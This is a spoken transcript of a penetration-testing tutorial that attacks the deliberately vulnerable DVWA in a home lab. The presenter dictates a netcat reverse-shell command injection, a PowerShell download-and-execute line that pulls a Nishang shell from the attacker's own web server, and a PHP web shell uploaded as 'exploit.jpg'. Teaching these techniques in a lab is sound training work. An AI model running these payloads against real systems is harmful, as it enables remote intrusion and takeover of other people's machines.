Right, hello and welcome guys, and in this tutorial video I'll be demonstrating web application exploitation. I'll be showing you how to conduct a remote code execution or command injection vulnerability, and also we'll look into a file upload vulnerability that leads to remote code execution. So as usual, I've got my Kali Linux machine started and also my Windows 7 lab machine. So these are the two virtual machines you would need for this specific exercise. So quick thing I'll do is to do an if config and find out the IP address of my Kali. On my Windows, I've also run a similar command, ipconfig, and this is the IP address 192.168.219.137. So from your Kali Linux, what you can do is to open up Firefox and go to that IP address 192 for your I believe mine is 137. So go on to 137, and on port 8080 you should have access to a web application known as the DVWA, also known as the Damn Vulnerable Web Application. So this web application, you can log in with admin and the password is password. So admin and password all lowercase, and you should be able to log in. So you can see that's the password. Okay. Right. So welcome to Damn Vulnerable Web Application. This application is designed with PHP and MySQL and is very vulnerable. We can test different types of vulnerability. So what this application does, it allows us to practice different vulnerabilities on PHP web applications. So in order to begin, we could go to the DVWA security, and you can see at the moment it's set to impossible. I'm going to make that low and click on submit, and then we can verify, if we go back here, that the the security level has been set to low. So it is completely vulnerable. There are no security measures, so that we can learn from scratch. So the first thing I want to demonstrate is the command injection. So you click on this, and what this does is normally it says enter an IP address. So I could ping an IP address. So let's try to ping the local host 127.0.0.0.1. We click on submit, and we can see the results of the ping. Alright, so this web application allows us to ping any device as long as we put an IP address. Let's put the IP address of our Kali machine and try to ping that as well. 168.219.136. Submit, and we should get a response that we can ping. So basically, this is what this application does. 168. Let's ping that again. And you can see we got a response received, 0% loss, so that is fine. Now what this application actually does is that it sends this command to a shell inside of this web application. That's the way it's been designed. So what happens is, if we append using the ampersand, a double ampersand, we can actually execute other commands. So I could ping this and as well attach things like dir, which is a Windows command, because this is running on a Windows application, is running on the Windows 7. So the damn variable application is installed on my Windows 7 lab machine. We're just accessing it by going to the IP address of the Windows machine on port 8080. So if I click on submit, it would execute the ping. Also, it will execute the dir command. So this is a classic command injection vulnerability. So let's see the output. Let's try that again. I think I got that IP address wrong. dir, so it's 168.209 dir, submit. Right, you can see we got the ping results, and also we got the directory. You can see it's listing the directory where we have the web application on the Windows machine. Right, so you can see it says czamp htdocs wwa exec. So this is where we have the directory. So how can we use this to get a reverse shell? So if you remember, on our Windows machine, at some point we transferred netcat. So in the early tutorials that we did, we copied netcat. All right, we copied netcat from here, and I asked you to put that into the Windows directory. So I've already done that before, and I can see I've got netcat already on my Windows 7 lab machine. So let's see how we can exploit this vulnerability and use netcat, which is already on the Windows 7, to get a reverse shell. So again, I can do my ping to this IP address. However, I would then append netcat-nv, the IP address of my Kali, which I want to use to get the reverse shell, 168.219.136 space the port. So I'll use 9001, or you can go for 4444. Let's try 4444, and then -e space cmd.exe. So we want to say, once you execute the ping, also execute this netcat command. So before I click on submit, I'm going to open up a shell, or let's just open up this shell, clear, minimize this. I'm going to put this somewhere here so that it's easy for you to see when we get the shell. I'm going to put this always on top, and then I start my netcat listener, nc-nvlp on port 4444, and once we click on submit, we should get a reverse shell. There we go. As you can see, we have a shell. So a typical classic command injection allows you to remotely execute commands on the vulnerable application. As you can see here, we have a shell. If we then do if config or IP config, we can confirm definitely we've got a shell on the Windows machine. Click on exit, and then we exit our shell. So now this is easy because we already have netcat. Like I mentioned, we already have netcat already on this machine. So let's assume that we don't have netcat and we have this vulnerability. How do we exploit it to then get a reverse shell? So let's do that sort of scenario. So for this, I'm going to use a different tool for web applications, which was mentioned in the lectures, and this is Burp Suite. So Burp Suite is the tool we're going to use. To use Burp Suite, the first thing we need to do is let's open a new tab in our Firefox and go to the settings, and I'm going to search for network settings. Click on settings, and then I'm going to set up a manual proxy. Now the role or the job or what the functionality of Burp Suite is that if you send a request to a web server, you can intercept that request and manipulate that request before you then resend it to the specific web application. So Burp Suite allows us to capture a post request or any sort of request or GET request to a web application. We can intercept it, that traffic or that request, manipulate that request, make changes, and then we can then forward that request again to that specific web server. So we click on manual proxy configuration, and then we use our localhost IP address 127.0.0.1, and then on the port we go for 8080. So any request we're sending out to any web application will be intercepted on our proxy. We're setting our own browser to use burp. By default is going to be running on port 8080 to intercept the web traffic. So I'll click on OK, and that should be fine. Now I'm going to start up Burp Suite. Click on OK. I'll set the default settings. Click on Accept, and it says Update. I'm going to click on Close and go for Next and start Burp. Okay, so this is Burp Suite. I don't know how to make this bigger. Perhaps there's a way that you could allow the tabs on here to be the font size. If you know how to do this, please let me know. I'm sure I'm just a Google search away from making all of this very, very easier to read if you're watching this video. So anyway, we've got Burp started up. Now let's go back to our web browser, and we want to intercept, let's say we want to intercept the first request that we made, which is this ping request. Okay, so ping in this IP address. Now let's send this to Burp. Remember, we've got Burp running. What we need to understand is we have to go to the proxy, and you can see by default proxy is on. You could turn it off by clicking on it, or you can turn it on. So we're saying intercept on, and that means any web traffic going here will be intercepted by Burp. So Burp target proxy. If you have a look at the options, we can see the 127.0.0.1.8080 is where Burp is running, and that's why we had to go and make these changes in our network settings, if you remember, so that Burp can intercept. So this is the port Burp is listening to, and we can use that to intercept the traffic. So going back here, let's click on Submit, and you can see that the request is hanging. All right, it's just hanging because if we go to Burp or we go to intercept, we can perhaps see the request somewhere here. Look at it. Okay, so in the intercept we can see that is the request that we sent, IP address and submit. We can actually see that within the post request in Burp. Also, if you click on the HTTP history, you can see the post request in Burp. So this is the request, okay, in the intercept. Now, what we need to do, we can click on forward to forward this traffic, but that's not what we want to do. What we're going to do is to right click and send this to repeater. Click on send to repeater. And then when we click on the repeater tab, we can actually see the request. So I'm going to go back to the dashboard, to proxy. Intercept. I'm going to turn that off, go back to repeater, and then I'm going to click on send. Now when we click on send, Burp will forward that request, and here we can see the response. If we scroll down, we can see the response to the ping. Okay, so that is Burp Suite working. Now that we have this, we can try other commands. So let's say the one we did before, ampersand, okay, and we could do stuff like ipconfig. Okay, so we are appending two commands, and now we can click on send again. So we don't have to keep repeating this all the time, and that's what Burp does. Burp allows us to manipulate the intercepted traffic, and we can send that as multiple times by making changes. If we go back here now, we should see the results. You can see the result of my ping, and also should we see the IP config? We see the results. I'm trying to see if I can find the results of the IP config. Let's try this again. I think what we need to do is to highlight this, right click and URL encode, convert URL encode all characters. Let's send this again. Right, as you can see now, we have the ping and also the results of our IP config. So by URL encoding what we put in, Burp then sends that request to the server, and now we have the commands. So what we're going to do now is we are going to use a tool to get a reverse shell. So let's go back to our Kali, and we go into our tools directory on your Kali Linux machine and do a list. And we're going to use this tool called Nishang, which is a PowerShell reverse shell payload. So we cd into Nishang, do a list, and we go into the shells directory. So cd shells, do a list, and what we need is the PowerShell TCP, invoke TCP shell. Right, so this is the exploit that we need. So I'm going to make a copy of this. So copy this, cp copy, paste, and I'm going to put this into my tools directory, and I'm going to call this PowerShell.ps1. Okay, PowerShell.ps1. So I'm copying this PowerShell exploit, and or this PowerShell reverse shell exploit, and then I'm copying it into my tools directory. So now if we go back 2 steps and do a list, we have our PowerShell script. Now let's have a look at this script because we need to understand how it works. Okay, so this Nishan script can be used for reverse or bind interactive PowerShell from a target. So what it means is you can if you can download this PowerShell script to a Windows machine and execute it, you should get a reverse shell. So this is what we're going to use to get a shell. So assuming we don't have Netcat already on this machine and we want to exploit the vulnerability of the command injection, we can use Nishang, so we can download this PowerShell. So we can use one of our file transfer techniques to transfer this file onto the Windows machine and then execute it and get a reverse shell. So that's what we're trying to do. So how do we actually use this script? So if you have a look at this script, let's just scroll. It says the parameter. So if you want to get a reverse shell, this is how you need to execute. So to invoke a reverse shell, or if you want to get a bind shell, this is what you need to use. So I prefer the reverse shell. So what we're going to do is copy this example. I'm going to copy this, and I'm going to scroll to the end of the script, to the very end. All right, at the end of the script. So I'm going to go to the very end, and I'm going to paste that command, invoke PowerShell reverse. Now what I'm going to do is I'm going to change the port, probably to 9001, and then the IP address will be the IP address of my Kali. So it's 219.136. That is the IP address of my Kali machine, and this is the port number I want to get my reverse shell on. Control X, Y to save the script. Now I have the script. Now, what I'm then going to do is to use the vulnerability we found, which is this. Okay. Let's get rid of all of this. So we want to ping this IP address, and then we use the double ampersand and and we append. So we have to do a download. So we have to do a PowerShell download. So let's look for a tool where I can write the command. I got leaf pad. Okay. Right. So I needed to pay attention to this. Let's make the font a bit bigger. Okay. So the command is PowerShell. So I'm going to type this out, PowerShell. Okay. Space. I'm going to open double quote. I'm going to do IEX. Open a bracket. New dash object. So I want to do a file transfer. Let's see if I can make this bigger. Space net dot web client. So make sure you're typing this correctly if you're doing this. Dot download string. Open up another bracket, single quote, HTTP, and then I put in the IP address of my Kali, which is 192.168.219.136. Okay, and let's do colon 8001. I'm going to explain why I'm using this 8001 slash the file we want to download, PowerShell.ps1. I'm going to end this with a single quote, close the bracket, and then end this finally with a double quote. So this double quote is closed by this one, and this single quote closes the one inside of the bracket. Now I'm going to then copy this PowerShell command into my command injection vulnerability. So I'm going to attach it here, and when I click on submit, it will download the PowerShell script, this PowerShell script, and execute it on the Windows machine, and then we should get a reverse shell. So before we do this, remember, it says in this directory we have the PowerShell PS1 scripts. If you remember from our file transfer, we need to start up a Python server. So Python 3-m http.server, and I want that server to be running on 8001, and that's because 8001 is where we're telling the PowerShell script to grab. That is where the web server is, and that is where you should grab this file, this PowerShell PS1 script from. So we want to start a web server on port 8001. So now we have this running on port 8001. I'm going to open another tab, and we have our netcat listener nc-nvlp port 9001, and that's because if you remember in our PowerShell script, port 9001, our PowerShell script, port 9001 is where we have the reverse shell. Okay, let's remind ourselves about that. So let's do nano PowerShell again, just to remind ourselves. And if we go to the end of the script, remember when we copied the script, we invoked the reverse shell, as you can see, to port 9001. So that's why we have to have our netcat listener on port 9001. So let's go back. So we have this web server running. Now we can copy that command. This command. Let's copy this command. Copy. Okay. We go into our web browser and paste this command. Paste. Now we go to Burp Suite. Okay, go to proxy, and we can actually go to history and clear history. Clear all history. Yeah. So so that we don't have anything here. We go to intercept and turn intercept on. We go back to our browser and submit the command. Now Burp Suite has intercepted our traffic, as you can see here. Okay, we can right click and send this to send to repeater, turn intercept off, go to repeater. We have the request, and basically we can URL encode every single thing here so that we don't have any issues with the commands. So we can highlight everything, right click and say convert selection URL encode. You can actually use Ctrl U to do this if you want, or you can just select it from here. So we've URL encoded everything here. Now let's send. Before we send, let's have a look at our netcat listener. We have our netcat listener running, and I want to have this at the top so that when we send this, hopefully we get a shell, so we can see that in live action. So send. Let's put that back. Always on top. So we're just waiting. If we go in here, we can see that the file has been downloaded by the target successfully, and we're just waiting for it to execute that reverse shell. Hopefully this works. We're sure that it did get the PowerShell PS1, but then did it execute the command 9001? No, we don't get a shell. So let's go back to here. We have the PowerShell script, and let's test this again. Let's go back to Burp Suite. Let's close this. Close this. Let's go back to proxy, intercept on. Let's go here and submit. Go to Burp Suite. We have this. Everything looks fine. Let's forward this to repeater. Intercept off. Go back to repeater. Let's have our netcat listener again, and let's send this time to see what happens. So we send, and here we go. So without URL encoding, you can see that we've successfully, it downloaded the file again and automatically executed it, and here now we have a shell. And you can see this is a PowerShell reverse shell. So without URL encoding, we successfully managed to get a shell on the box, but this time around is a PowerShell. So in a nutshell, what we did was, if we don't have netcat in this sort of scenario, we found a command injection. We can just use Nishank, which is a tool that allows us to invoke a PowerShell reverse shell. So I hope that was useful and you understood that. So the next vulnerability we can just exit the shell. The next vulnerability I am going to demonstrate is the, if we go back to, let's remove this from always on top. Okay, the next vulnerability we're going to look at in the DVWA is, so let's make sure that we've got our security still in low, so that's fine. The next one is the file upload vulnerability. So let's say you found a vulnerability that allows you to upload a file. Remember, this application is running PHP and we have to upload a file, and hopefully if the application is vulnerable, it will process our PHP exploit and we can get a reverse shell. All right, so let's see how we can do this in a case on this Windows machine. So what we can do first of all, in order to make this vulnerability work on this damn variable web application, I am going to go to my Windows 7 lab machine and make some changes. So let's go to Toolbox and we go to C drive, we go to XAMPP, and we go to htdocs. And within XAMPP, let's have a look at PHP, and I'm looking for the PHP configuration file. So I'm looking for this file here. As you can see, this file here that says configuration settings. Okay, let's make this bigger. This one that says configuration settings. I'm going to open this up with Notepad, and I'm going to go for edit and find, and I'm going to go for allow underscore URL. So I'm going to enable a vulnerability here, find. Let's go to find again. Okay, before we come here, let's skip this because I think it'll become much more complicated if you don't understand this. So let's leave here first. Let's go back to our Kali machine, to that specific vulnerability. So let's try to upload a malicious file that we can execute. So it says browse or choose an image to upload. So your Kali machine, let's clear screen. If you do locate shells, there are different shells that we can use, especially with web application shells. So I'm going to go for this PHP web shell. All right, go to that directory. So let's clear screen. So I'm going to cd into this directory and we'll do a list. Now we have different sort of like PHP backdoor you can use. So these are PHP reverse shell. So if you want to exploit a Linux machine, for instance, you can upload this PHP reverse shell onto that Linux machine and have the application execute it, and you can get a reverse shell. So let's say, for instance, that a web application is running PHP but it's installed on a Linux machine. We can use this PHP reverse shell backdoor, but we're exploiting a Windows machine. Remember, this is a Windows machine that's running an application with PHP. So what I'll do is, let's have a look at this other one, this simple backdoor. So let's cat simple backdoor, and we can see that this simple backdoor, it says usage. We can then use this cat plus cmd. This will allow us to execute commands. So we just have to find this file, okay, and then we use the cmd cat, and then we can use it to execute a file. What I'm going to do is, rather than using this, I'm going to create my own sort of PHP backdoor. So let's go to our tools directory. So let's just cd /tools or cd tools, and I'm going to create a file called nano exploit.jpg. all right, so remember, we want to upload an image. So I want to create a PHP backdoor but I'm going to call it exploit.jpg. So let's create our own exploit backdoor that we can upload as a file. So I'm going to call this exploit.jpg. all right, because we need to upload a JPEG file. All right, we need to upload, an image, and a JPEG is an image. So we're going to create an exploit JPEG file called exploit.jpg, and we can create a PHP shell code. So command. So we open up the PHP tag, PHP space echo space shell underscore exec. So similar to the backdoor I showed you earlier on in the web shells, we're going to create a web shell that we can upload to the target. So exec, open one curly bracket or a bracket, and we put $_ get. We open up a square bracket, 1:, CMD, or 1 quote, sorry, not a colon. So exec bracket $_ get. We open up a square bracket, 1 quote, CMD. We close it with another one. We close the square bracket, we close the other bracket. So this one closes this one, and the square bracket here closes the one within for the CMD. And then we do a semicolon. We then close the PHP tag. So PHP echo shell, we're saying execute this get command, and I think this should be fine. So we can save this, Ctrl X, yes. Now if we do a file on this exploit.jpg, Linux recognizes this as a PHP script. Now, even though we're giving it a different extension, it's actually looking at the contents of that file and tells us that this is a PHP script. So let's try to upload this file onto our target. So root, go to tools, exploit.jpg, open, okay, and then we click on upload. So it says successfully uploaded to this directory. So let's copy this directory out, because we're going to need it when we want to find out where we need to go to execute this file. All right. So now, in order to be able to execute this file, we need to go to the file inclusion tab, and you can see here it says the PHP function allow _URL include is not enabled. Okay, so sometimes when developers make code, they might forget and enable this function. If this function is enabled, it allows you to be able to include a file that you can execute on a specific target. So what we need to do is we need to go here and enable this specific function. So let's copy this. We go back to our Windows 7 toolbox. We go to C, I believe, XAMPP. So XAMPP is where we have the web application running, and we're looking for that PHP configuration file, PHP, and we're looking for the PHP configuration file. Remember the settings. So I'm going to open this file up with Notepad, and then I'm going to look for that using the find command. We're looking for this allow include. So we click on next. We can see that the file upload on, that's fine. The allow include is what I'm looking for, and you can see the allow URL include here is off. So we have to change this to on. As you can see, whether to allow requires URLs to be able to allow. So we're going to change this to on. All right. And we can save this file. So file, and then we save. Okay, close this. And we close this. So if we go back in here, let's see if we refresh, does that message go away? No, we still have it. So what we need to do is we have to restart the server, the XAMPP server, so that that change can take effect. So I'm going to stop the Apache server on my Windows machine, and I'm going to start it off again. Okay, now if we go to our Windows 7 lab machine, to the Kali machine, and we refresh this page, let's just refresh, we can see that error has now disappeared. So we've enabled file inclusion. So now if we then go to this URL and paste this, copy, paste this, and then if we have comma cmd equals, now let's see if we can execute commands. So if I do something like ipconfig and we click this, exploit JPEG ipconfig, that should be fine. Let's see, let's go back, click on enter. It's saying fail to open stream. Do we have an issue? Let's verify what we did. Okay, so I think what I'm doing wrong here is, let's go back. Nope, 8080. Let's go back here. So rather than having this question mark, what I should have is the ampersand and let's try this. Rather than question mark, let's click on this, and you can see now we can actually see the result of the ipconfig. So it was just for me to put in the ampersand here, and now we have this. So similar to what we had before when we did the command injection, where now you can begin to execute commands by uploading a malicious JPEG, we can now begin to execute commands on this machine. Does that make sense? So we can do the same approach, or we can follow the same approach like we had before, where we just invoke nishang to get a reverse shell. So let's see how we can do this again, to use nishang to get a reverse shell. Now that we have this command, we can go again to burp, remember, history. You can close this in burp. Go to proxy, click on intercept on. Okay, we have intercept on. We go back here, and then we send this through burp. If we go back to burp, and we can see this is the command, all right, get request to this. Now we can just use the same command we did before, if you remember, from the nishang. So we can copy this now again. All right. Because we already have this file on the target, it might be worth changing this. So let's call this PowerShell 2. Okay, PowerShell 2. So that we don't have the same file that we are trying to call this time around. So we have PowerShell 2. We go in here to our exploits, and we just create another copy. So copy PowerShell.psi. Okay, we just want to make another copy, and we're going to call this PowerShell2.ps1. okay, we just want to make another copy. If you do a list, you can see now we have PowerShell 2. Now we can start our Python server. Hopefully I still have the command. Or let's just do it again. Okay, so list, and then we can do Python 3 -m http.server 8001. It says the server is already in use. We already have it here anyway. Okay, that's fine. We already have this anyway. So we already have our server running at port 8001, and that's why we got that error message. So that is fine. Now we can copy this command, go here and put this command here, paste. No, let's use, burp. We already have this intercepted in burp. Before we do this, we can forward this to repeater, turn intercept off, go to repeater, and then change this to that command. So let's paste that command. As you can see, we can probably URL encode that command alone. Okay, so right click, URL, convert selection, URL, encode all key characters. Okay, and now if we have our port 9001, so NC-NVLP 9001, hopefully when we send this request we should have a reverse shell. So fingers crossed, send. Do we get a shell? There we go. Yes, we do. We have a reverse shell. So basically, from a file upload, we uploaded a web shell. We successfully located where that web shell is on the target, which is here on this directory. And now we can then execute a command by asking it to do the same thing that we did before in the command injection. So you might have to watch this a couple of times to understand the concept. But if you got this far, congratulations. And I think this is a good time to end this video, and I should create a separate video where we'll talk about some other vulnerabilities like SQL injection, how you can use an SQL injection to obtain remote code execution in some scenarios, and I should speak to you some other time. Take care.